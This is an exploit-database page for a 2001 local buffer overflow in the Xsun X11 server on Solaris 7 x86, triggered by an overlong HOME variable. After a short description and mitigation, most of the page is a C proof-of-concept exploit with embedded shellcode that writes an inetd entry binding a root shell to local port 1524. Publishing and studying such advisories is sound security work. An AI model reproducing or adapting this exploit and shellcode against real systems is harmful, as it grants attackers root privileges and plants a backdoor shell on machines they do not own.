header-logo
Suggest Exploit
vendor:
Solaris
by:
riley@eeye.com
7.2
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: Solaris
Affected Version From: Solaris 7 (x86)
Affected Version To: Solaris 7 (x86)
Patch Exists: YES
Related CWE: N/A
CPE: o:sun:solaris:7
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Solaris 7 (x86)
2001

Solaris 7 (x86) /usr/openwin/bin/Xsun HOME environment overflow

The X11 server that ships with Sun Microsystems' Solaris, Xsun, contains a locally exploitable buffer overflow vulnerability. The condition is present when the value of the HOME environment variable is of excessive length (more than 1050 bytes long). An attacker may exploit this vulnerability to execute arbitrary code with effective group 'root' privileges.

Mitigation:

The user should ensure that the value of the HOME environment variable is not of excessive length.
Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/2561/info

The X11 server that ships with Sun Microsystems' Solaris, Xsun, contains a locally exploitable buffer overflow vulnerability.

The condition is present when the value of the HOME environment variable is of excessive length (more than 1050 bytes long).

An attacker may exploit this vulnerability to execute arbitrary code with effective group 'root' privileges. 

/***********************************/
Solaris 7 (x86) /usr/openwin/bin/Xsun
HOME environment overflow

Proof of Concept Exploitation
riley@eeye.com

Puts a Root shell on local port 1524
/***********************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BUFLEN  1041

/* seteuid/setuid/inetd shell */
char eyecode[] =
"\xeb\x51\x9a\x65\x65\x79\x65\x07\x90\xc3\x5e"
"\x29\xc0\x89\x46\xab\x88\x46\xb0\x89\x46\x0c"
"\x50\xb0\x8d\xe8\xe4\xff\xff\xff\x29\xc0\x50"
"\xb0\x17\xe8\xda\xff\xff\xff\x29\xc0\x88\x46"
"\x17\x88\x46\x1a\x88\x46\x78\x29\xc0\x50\x56"
"\x8d\x5e\x10\x89\x1e\x53\x8d\x5e\x18\x89\x5e"
"\x04\x8d\x5e\x1b\x89\x5e\x08\xb0\x3b\xe8\xb2"
"\xff\xff\xff\x90\x90\xc3\xe8\xb2\xff\xff\xff"
"\x90\x6b\x61\x6d\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x2f\x62\x69\x6e\x2f\x73"
"\x68\x20\x2d\x63\x20"
"echo \"ingreslock stream tcp nowait root /bin/sh sh -i\">/tmp/eeye;"
"/usr/sbin/inetd -s /tmp/eeye2001";

char buf[BUFLEN];
unsigned long int nop, esp;
long int offset = 0;

unsigned long int get_esp()
{__asm__("movl %esp,%eax");}

int main (int argc, char *argv[])
{
	int i;
	if (argc > 1)
		offset = strtol(argv[1], NULL, 0);
	else
		offset = -200;
	esp = get_esp();
	memset(buf, 0x90, BUFLEN);
	memcpy(buf+800, eyecode, strlen(eyecode));
	*((int *) &buf[1037]) = esp+offset;
	strncpy(&buf[0],"HOME=",5);
	putenv(buf);
	execl("/usr/openwin/bin/Xsun", "eEye", ":1",NULL);
	return;
}